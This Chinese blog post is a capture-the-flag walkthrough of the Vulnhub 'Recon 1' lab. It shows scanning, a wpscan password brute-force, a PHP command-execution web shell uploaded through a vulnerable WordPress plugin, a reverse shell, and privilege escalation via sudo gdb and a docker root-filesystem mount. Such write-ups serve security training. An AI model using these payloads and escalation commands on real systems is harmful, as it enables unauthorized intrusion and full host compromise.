首页 > 其他分享 >Vulnhub之Recon 1靶机详细测试过程

Vulnhub之Recon 1靶机详细测试过程

时间:2023-03-17 11:47:42浏览次数:45  
标签:__ http Recon 56.220 192.168 content Vulnhub wp 靶机

Recon 1

作者:jason huawen

靶机信息

名称:recon: 1

地址:

https://www.vulnhub.com/entry/recon-1,438/

识别目标主机IP地址

─(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:f7:86:46      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.220  08:00:27:23:fc:ec      1      60  PCS Systemtechnik GmbH                                                   


利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.220

NMAP扫描

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.220 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-16 21:52 EDT
Nmap scan report for localhost (192.168.56.220)
Host is up (0.00022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 93:0b:57:ce:cb:d5:2b:c5:e6:48:dc:ed:89:6c:51:44 (RSA)
|   256 64:26:e5:bd:85:e9:f8:29:d9:bd:ed:2f:ca:a5:f7:0a (ECDSA)
|_  256 5e:41:4c:19:e2:3c:c4:68:13:0c:5f:6f:f8:71:e6:1b (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: WordPress 5.3.2
|_http-title: recon – Just another WordPress site
MAC Address: 08:00:27:23:FC:EC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.67 seconds

NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)

获得Shell

浏览器访问80端口,从返回页面内容可知目标主机运行wordpress站点

──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ curl http://192.168.56.220/robots.txt                      
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.220 Port 80</address>
</body></html>
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ nikto -h http://192.168.56.220       
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.220
+ Target Hostname:    192.168.56.220
+ Target Port:        80
+ Start Time:         2023-03-16 21:55:56 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.56.220/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2023-03-16 21:57:07 (GMT-4) (71 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ nikto -h http://192.168.56.220       
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.220
+ Target Hostname:    192.168.56.220
+ Target Port:        80
+ Start Time:         2023-03-16 21:55:56 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.56.220/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2023-03-16 21:57:07 (GMT-4) (71 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ gobuster dir -u http://192.168.56.220 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.220
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Extensions:              sh,php,html,txt,js
[+] Timeout:                 10s
===============================================================
2023/03/16 21:57:43 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.56.220/]
/wp-content           (Status: 301) [Size: 321] [--> http://192.168.56.220/wp-content/]
/wp-login.php         (Status: 200) [Size: 4815]
/license.txt          (Status: 200) [Size: 19935]
/wp-includes          (Status: 301) [Size: 322] [--> http://192.168.56.220/wp-includes/]
/readme.html          (Status: 200) [Size: 7368]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 319] [--> http://192.168.56.220/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 42]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://192.168.56.220/wp-login.php?action=register]
/server-status        (Status: 403) [Size: 279]
Progress: 1322063 / 1323366 (99.90%)
===============================================================
2023/03/16 22:02:19 Finished
===============================================================

目录扫描没有得到更有价值的信息。

──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 -e u,p                   
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.220/ [192.168.56.220]
[+] Started: Thu Mar 16 22:02:46 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.220/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.220/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.220/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.220/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.220/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://192.168.56.220/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://192.168.56.220/wp-content/themes/twentytwenty/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://192.168.56.220/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] recon
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.220/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] reconauthor
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Mar 16 22:02:55 2023
[+] Requests Done: 55
[+] Cached Requests: 6
[+] Data Sent: 13.911 KB
[+] Data Received: 405.11 KB
[+] Memory used: 240.016 MB
[+] Elapsed time: 00:00:08

(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 -U recon -P /usr/share/wordlists/rockyou.txt

尝试破解密码失败(运行了16分钟)

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 --plugins-detection mixed
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.220/ [192.168.56.220]
[+] Started: Thu Mar 16 22:22:31 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.220/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.220/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.220/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.220/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.220/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://192.168.56.220/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://192.168.56.220/wp-content/themes/twentytwenty/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://192.168.56.220/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.220/wp-content/themes/twentytwenty/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:06:23 <=======================================> (101765 / 101765) 100.00% Time: 00:06:23
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.56.220/wp-content/plugins/akismet/
 | Last Updated: 2022-12-01T17:18:00.000Z
 | Readme: http://192.168.56.220/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.0.2
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.220/wp-content/plugins/akismet/, status: 200
 |
 | Version: 4.1.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.220/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.56.220/wp-content/plugins/akismet/readme.txt

[+] insert-or-embed-articulate-content-into-wordpress
 | Location: http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/
 | Last Updated: 2022-11-27T22:41:00.000Z
 | Readme: http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt
 | [!] The version is out of date, the latest version is 4.3000000017
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/, status: 200
 |
 | Version: 4.2995 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.56.220/wp-content/plugins/insert-or-embed-articulate-content-into-wordpress/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Mar 16 22:29:30 2023
[+] Requests Done: 101943
[+] Cached Requests: 9
[+] Data Sent: 27.265 MB
[+] Data Received: 13.981 MB
[+] Memory used: 489.078 MB
[+] Elapsed time: 00:06:58

识别出插件insert-or-embed-articulate-content-into-wordpress,该插件有漏洞:

https://www.exploit-db.com/exploits/46981#:~:text=%23%20Exploit%20Title%3A%20Authenticated%20code%20execution%20in%20%60insert-or-embed-articulate-content-into-wordpress%60,PHP%205.6%20%23%20CVE%20%3A%20-%20%23%23%201.

但是这个漏洞是authenticated漏洞

还是需要首先破解密码

接下来尝试破解另一个用户的密码

─(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ wpscan --url http://192.168.56.220 -U reconauthor -P /usr/share/wordlists/rockyou.txt
] Valid Combinations Found:
 | Username: reconauthor, Password: football7

此时应该可以利用插件漏洞,步骤:

# 1. Create a .zip archive with 2 files: index.html, index.php

echo "<html>hello</html>" > index.html
echo "<?php echo system($_GET['cmd']); ?>" > index.php
zip poc.zip index.html index.php 

## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it)
## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;)
## 4. Access the webshell from the URL displayed after upload similar to 

http://website.com/wp-admin/uploads/articulate_uploads/poc/index.php?cmd=whoami

参照上述步骤

──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ vim shell.php         
                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ ls -alh
total 40K
drwxr-xr-x  2 kali kali 4.0K Mar 16 23:11 .
drwxr-xr-x 80 kali kali 4.0K Mar 16 21:51 ..
-rw-r--r--  1 kali kali 1.6K Mar 16 22:41 dict
-rw-r--r--  1 kali kali   12 Mar 16 22:54 index.html
-rw-r--r--  1 root root 1.1K Mar 16 21:52 nmap_full_scan
-rwx------  1 kali kali 5.4K Mar 16 23:11 shell.php

                                                                                                                             
┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ zip jason_shell.zip index.html shell.php 
  adding: index.html (stored 0%)
  adding: shell.php (deflated 59%)


/wp-content/uploads/articulate_uploads/jason_shell/index.html

访问:

http://192.168.56.220/wp-content/uploads/articulate_uploads/jason_shell/shell.php

在Kali Linux上成功得到了目标主机反弹回来的shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/ReconEE]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.220] 45012
Linux hulk-buster 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 08:44:15 up  1:26,  0 users,  load average: 0.00, 0.04, 0.45
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ is
/bin/sh: 1: is: not found
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hulk-buster:/$ cd /home
cd /home
www-data@hulk-buster:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x  4 root          root   4.0K Jan 28  2020 .
drwxr-xr-x 23 root          root   4.0K Jan 28  2020 ..
drwxr-xr-x  3 hacker        hacker 4.0K Jan 28  2020 hacker
drwxr-xr-x  2 offensivehack docker 4.0K Jan 28  2020 offensivehack
www-data@hulk-buster:/home$ cd hacker
cd hacker
www-data@hulk-buster:/home/hacker$ ls -alh
ls -alh
total 28K
drwxr-xr-x 3 hacker hacker 4.0K Jan 28  2020 .
drwxr-xr-x 4 root   root   4.0K Jan 28  2020 ..
-rw------- 1 hacker hacker    8 Jan 28  2020 .bash_history
-rw-r--r-- 1 hacker hacker  220 Jan 28  2020 .bash_logout
-rw-r--r-- 1 hacker hacker 3.7K Jan 28  2020 .bashrc
drwx------ 2 hacker hacker 4.0K Jan 28  2020 .cache
-rw-r--r-- 1 hacker hacker  655 Jan 28  2020 .profile
www-data@hulk-buster:/home/hacker$ cd ..
cd ..
www-data@hulk-buster:/home$ cd offensivehack
cd offensivehack
www-data@hulk-buster:/home/offensivehack$ ls -alh
ls -alh
total 28K
drwxr-xr-x 2 offensivehack docker        4.0K Jan 28  2020 .
drwxr-xr-x 4 root          root          4.0K Jan 28  2020 ..
-rw------- 1 offensivehack offensivehack   72 Jan 28  2020 .bash_history
-rw-r--r-- 1 offensivehack docker         220 Jan 28  2020 .bash_logout
-rw-r--r-- 1 offensivehack docker        3.7K Jan 28  2020 .bashrc
-rw-r--r-- 1 offensivehack docker         655 Jan 28  2020 .profile
-rw-r--r-- 1 root          root            47 Jan 28  2020 user.txt
www-data@hulk-buster:/home/offensivehack$ cat user.txt
cat user.txt
oho!! not finished now.. find root flag.txt !!
www-data@hulk-buster:/home/offensivehack$ 

提权

www-data@hulk-buster:/home/offensivehack$ sudo -l
sudo -l
Matching Defaults entries for www-data on hulk-buster:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on hulk-buster:
    (offensivehack) NOPASSWD: /usr/bin/gdb
www-data@hulk-buster:/home/offensivehack$ sudo -u offensivehack /usr/bin/gdb -nx -ex '!sh' -ex quit
<offensivehack$ sudo -u offensivehack /usr/bin/gdb -nx -ex '!sh' -ex quit    
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
$ id
id
uid=1001(offensivehack) gid=119(docker) groups=119(docker)

切换到了offensivehack用户

$ id
id
uid=1001(offensivehack) gid=119(docker) groups=119(docker)
$ docker images
docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
ubuntu              latest              ccc6e87d482b        3 years ago         64.2MB
$ docker run -it -v /:/mnt ubuntu
docker run -it -v /:/mnt ubuntu

可以利用docker提权

root@d5bd00c86145:/mnt/root# cat flag.txt
cat flag.txt
   _____                 _        _       _        _   _   _                                                                                     
  / ____|               | |      | |     | |      | | | | | |                                                                                    
 | |  __  ___   ___   __| |      | | ___ | |__    | | | | | |                                                                                    
 | | |_ |/ _ \ / _ \ / _` |  _   | |/ _ \| '_ \   | | | | | |                                                                                    
 | |__| | (_) | (_) | (_| | | |__| | (_) | |_) |  |_| |_| |_|                                                                                    
  \_____|\___/ \___/ \__,_|  \____/ \___/|_.__/   (_) (_) (_)                                                                                    
              _     _   _             _              __ _                        _       _               _   _     _        _____ _______ ______ 
             | |   | \ | |           | |            / _| |                      | |     (_)             | | | |   (_)      / ____|__   __|  ____|
  _ __   ___ | |_  |  \| | ___   ___ | |__     __ _| |_| |_ ___ _ __   ___  ___ | |_   ___ _ __   __ _  | |_| |__  _ ___  | |       | |  | |__   
 | '_ \ / _ \| __| | . ` |/ _ \ / _ \| '_ \   / _` |  _| __/ _ \ '__| / __|/ _ \| \ \ / / | '_ \ / _` | | __| '_ \| / __| | |       | |  |  __|  
 | | | | (_) | |_  | |\  | (_) | (_) | |_) | | (_| | | | ||  __/ |    \__ \ (_) | |\ V /| | | | | (_| | | |_| | | | \__ \ | |____   | |  | |     
 |_| |_|\___/ \__| |_| \_|\___/ \___/|_.__/   \__,_|_|  \__\___|_|    |___/\___/|_| \_/ |_|_| |_|\__, |  \__|_| |_|_|___/  \_____|  |_|  |_|   
root@d5bd00c86145:/mnt/root#  

经验教训

  1. 一般情况下wpscan只需要破解管理员账号的密码,但是在本靶机中破解管理员密码失败,此时应当可以考虑另外一个用户,而且考虑到有漏洞的插件是针对任何角色(any role)的用户都存在

标签:__,http,Recon,56.220,192.168,content,Vulnhub,wp,靶机
From: https://www.cnblogs.com/jason-huawen/p/17226088.html

相关文章